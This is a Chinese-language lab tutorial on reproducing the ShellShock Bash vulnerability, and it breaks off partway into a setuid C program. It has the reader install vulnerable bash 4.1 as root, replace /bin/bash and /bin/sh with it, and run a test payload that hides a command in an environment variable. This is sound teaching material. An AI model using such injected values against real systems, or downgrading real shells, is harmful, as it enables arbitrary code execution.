ShellShock 攻击实验
一、 实验简介
2014年9月24日,Bash中发现了一个严重漏洞shellshock,该漏洞可用于许多系统,并且既可以远程也可以在本地触发。在本实验中,需要亲手重现攻击来理解该漏洞,并回答一些问题。
二、 预备知识
什么是ShellShock?
Shellshock,又称Bashdoor,是在Unix中广泛使用的Bash shell中的一个安全漏洞,首次于2014年9月24日公开。许多互联网守护进程,如网页服务器,使用bash来处理某些命令,从而允许攻击者在易受攻击的Bash版本上执行任意代码。这可使攻击者在未授权的情况下访问计算机系统。——摘自维基百科
三、实验准备
以root权限安装4.1版bash(4.2版本以上的漏洞已经被堵上了) bash4.1 原来的下载地址是 http://ftp/gnu.org/gnu/bash/bash-4.1.tar.gz ,为了加快速度,我们这里使用下面的下载地址 http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz
下载
$ sudo su
$ wget http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz
$ tar xf bash-4.1.tar.gz
安装
$ cd bash-4.1
$ ./configure #这一步过程比较长,请等待一会
$ make && make install
链接
$ rm /bin/bash
$ ln -s /usr/local/bin/bash /bin/bash
到这里就安装完了,接下来检测是否存在shellshock漏洞。
$ exit
$ env x='() { :; }; echo vulnerable' bash -c "echo this is a test"
输出vulnerable,说明bash有漏洞。
最后,让/bin/sh 指向/bin/bash.
sudo ln -sf /bin/bash /bin/sh
四、实验过程
重现 shellshock 攻击来理解该漏洞
首先,确保安装了带有漏洞的bash版本,并让/bin/sh 指向/bin/bash。
sudo ln -sf /bin/bash /bin/sh
在 /home/shiyanlou 目录下新建一个 shock.c 文件:
vi shock.c
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
void main()
{
setuid(geteuid()); // make real uid = effective ui